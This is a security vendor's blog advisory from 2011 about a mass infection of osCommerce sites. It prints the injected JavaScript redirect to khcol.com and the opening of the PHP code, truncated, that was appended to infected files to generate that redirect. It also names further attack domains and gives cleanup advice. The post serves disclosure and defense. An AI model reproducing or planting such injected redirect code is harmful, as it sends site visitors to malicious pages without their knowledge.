• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Continuing attacks against osCommerce: khcol.com

April 5, 2011David Dede

FacebookTwitterSubscribe

Busy week for osCommerce in terms of malware. First, the div_colors string, then, the CreateCSS string, and now, we are seeing thousands of osCommerce sites infected with a malware pointing to http://khcol.com. This is how it looks like in an infected site:

<script type="text/javascript">document.location = "http://khcol.com/page/?ref=aHR0cDovL2FtZXJ…..tL2FkbWluLw=="

This javascript is generated by the following code added to the bottom of all PHP files in the server:

<?php if(!isset($tf[‘engine’])){$tf[‘engine’]=1;$tf[‘s’]=base64_decode(‘a2hjb2wuY29t’);$tf[‘u’]=’http://’.$tf[‘s’]…


We recommend that every osCommerce user check their sites and to take the proper steps to secure them (especially if using v2.2). The file_manager.php file needs to be removed, and the admin directory renamed and protected. We also recommend our malware scanner to verify if a site is infected. If it is, we can take care of it for you.

Update 1: Google already blacklisted more than 1 thousand sites because of this malware. We have identified a lot more already, so this number should grow very soon.

Update 2: Other domains being used in this attack: solomon-xl.cz.cc, thescannerantiv.com, searchableantiv.com, www1.checker-network-hard.cz.cc and many others.

We will post more details as we track this malware.

FacebookTwitterSubscribe

Categories: Vulnerability Disclosure, Website Malware InfectionsTags: Hacked Websites, Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. mac

    April 6, 2011

    it’s redirecting to khcol com it’s hit my website too, because my hosting company removed all permissions off the folders of my wordpress installing.

    does anyone know if just removing that bit of code fixes the issue?

  2. mac

    April 6, 2011

    Sorry double post

  3. aditya menon

    June 5, 2011

    I shifted from osCommerce to opencart a long time ago. I got sick of all the attacks. Opencart really is easier and more beautiful to use, programmed with an OOP MVC approach, DIV and CSS layout from the start.. and it’s free too.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

How to Clean a Hacked Website Guide

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.